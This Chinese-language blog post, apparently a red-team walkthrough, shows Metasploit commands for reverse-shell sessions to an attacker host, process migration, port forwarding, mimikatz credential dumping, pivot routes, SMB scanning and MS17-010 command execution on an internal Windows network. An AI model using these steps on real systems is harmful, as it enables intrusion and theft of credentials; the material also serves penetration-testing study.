運用到的一些msf攻擊手法
獲得shell
Getshell的過程沒什麼好說的,無非簡單的後臺弱口令到上傳然後冰蠍連接getshell。獲得shell後,模擬終端ping 8.8.8.8有返回包,說明該服務器與外網互通。
既然跟外網互通,那麼可以嘗試直接使用msf的exploit/multi/handler配合冰蠍反彈shell來獲得session
<code>use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost xxx.xxx.xxx.xxxset lport 5665run/<code>
但是結果很不盡人意,沒能夠成功獲得session。在使用冰蠍模擬終端收集信息過程中,發現本地有powershell進程。
再次打開msf,本次嘗試使用web_delivery配合終端執行powershell指令來獲得session。
<code>User exploit/multi/script/web_deliverySet targets 2set payload windows/x64/meterpreter/reverse_httpsset lhost xxx.xxx.xxx.xxxset lport 4332set srvportrun/<code>
獲得payload,使用冰蠍或者C刀模擬終端直接執行,成功獲得session,執行getuid發現權限為system權限,省去了提權過程。
權限維持
為了獲得一個持久穩定的高權限session,我們需要將當前的session進程遷移到一個持久、堅挺又穩定的進程上,防止突然暴斃
我們使用ps查看當前進程,然後選中一個看起來比較持久的幸運兒spoolsv.exe(這是一個用來控制打印的進程,我遇到的機器基本都開啟了此進程)
注意:選擇進程的時候優先選擇系統進程,這種比較持久且為system權限<code>migrate 進程號getpid/<code>
內網信息蒐集
不管是在什麼類型的滲透環境下,信息蒐集永遠是不可缺少的一環,他決定了你滲透的效率,可以讓你在滲透過程中少走很多彎路,畢竟在項目上尤其是紅藍攻防中,最缺的永遠是時間
接下來,查看IP信息以及arp緩存,查看網段分佈情況:
發現該服務器只存在192.168.10.0/24網段的信息於是繼續查看其他信息
<code>Netstat -ano/<code>
發現服務器開放3389端口:
既然開啟了3389端口,我們使用端口轉發,登錄到服務器看看有沒有意外收穫。
<code>portfwd add -l 6666 -p 3389 -r 127.0.0.1/<code>
IP有了,3389開了,現在我們缺少的是用戶名密碼直接
meterpreter下加載mimikatz<code>Load mimikatzWdigest/<code>
比較遺憾的是沒能獲取到明文密碼,但是我這邊使用cobalt strike加載的mimikatz成功獲取到明文密碼emmm總之搞不懂的地方先歸為玄學問題
現在,密碼也有了,mstsc鏈接目標3389端口成功此處涉及的敏感信息較多,放棄截圖,我儘量用語言表述清楚思路上傳netpass查看rdp緩存,無果,但是發現系統有VNC
VNC:VNC (Virtual Network Console)是虛擬網絡控制檯的縮寫,是一款遠程控制工具軟件。
查看VNC相關文件發現新的網段信息,但是沒有保存的連接信息,不過能獲得新的網段信息也是知足了
橫向
至此,信息收集部分其實也就差不多,接下來我們開始嘗試橫向移動
根據之前發現的網段信息以及服務器本機的路由信息,我們手動添加路由
<code>Run autoroute -s 192.168.10.0/24Run autoroute -s 172.16.0.0/24……/<code>
其他網段同理,添加路由之後bg退回到控制檯先使用auxiliary/scanner/smb/smb_version模塊掃描一下各網段的smb服務開啟情況
<code>Use auxiliary/scanner/smb/smb_versionset rhosts 192.168.10.0/24set threads 10run/<code>
可以看到,活著的機器還挺多。
然後,使用auxiliary/scanner/smb/psexec_loggedin_users模塊配合已獲得的兩組賬戶密碼進行橫向
<code>Use auxiliary/scanner/smb/psexec_loggedin_usersSet rhosts 192.168.10.0/24Set smbuser usernameSet smbpass passwordSet threads 5run/<code>
尷尬,橫向失敗,居然沒有用同賬戶密碼
既然橫向失敗,可以考慮最簡單的,但也是最實用的大殺器,ms17-010先使用scanner模塊掃描一下哪些機器可能存在ms17-010的漏洞
<code>Use auxiliary/scanner/smb/smb_ms17_010Set rhosts 192.168.10.0/24Set thread 20Run/<code>
由於打ms17-010的流量比較大,為了防止死掉,我根據掃描出來的結果,針對性的選擇一臺感覺比較容易搞的目標,單獨打。此處試了很多機器,好多都打了補丁,不過也有漏網之魚,此處單獨拿一臺示例:Use auxiliary/admin/smb/ms17_010_commandset rhost 192.168.10.18set command whoamirun
成功執行,是system權限,同理command換成彈shell的命令,便可以獲得該機器的權限。
獲得新機器的權限之後,便可以圍繞新機器進行新一輪的信息蒐集,然後不斷橫向,進一步擴大內網戰果,以下,就不在多做測試。另外對於ms17-010,如果說打2003的機器,建議使用auxiliary/admin/smb/ms17_010_command模塊進行執行命令獲得session;其他的可以直接使用exploit/windows/smb/ms17_010_eternalblue或者exploit/windows/smb/ms17_010_psexec來直接獲得session。
寫在最後
提醒家:道路千萬條,安全第一條;滲透不規範,親人兩行淚。以上滲透測試過程純屬本人杜撰,滲透是不可能滲透的,這輩子都不可能滲透的。如果你還沒懂那我也沒辦法啦
閱讀更多 戴丶小莫 的文章
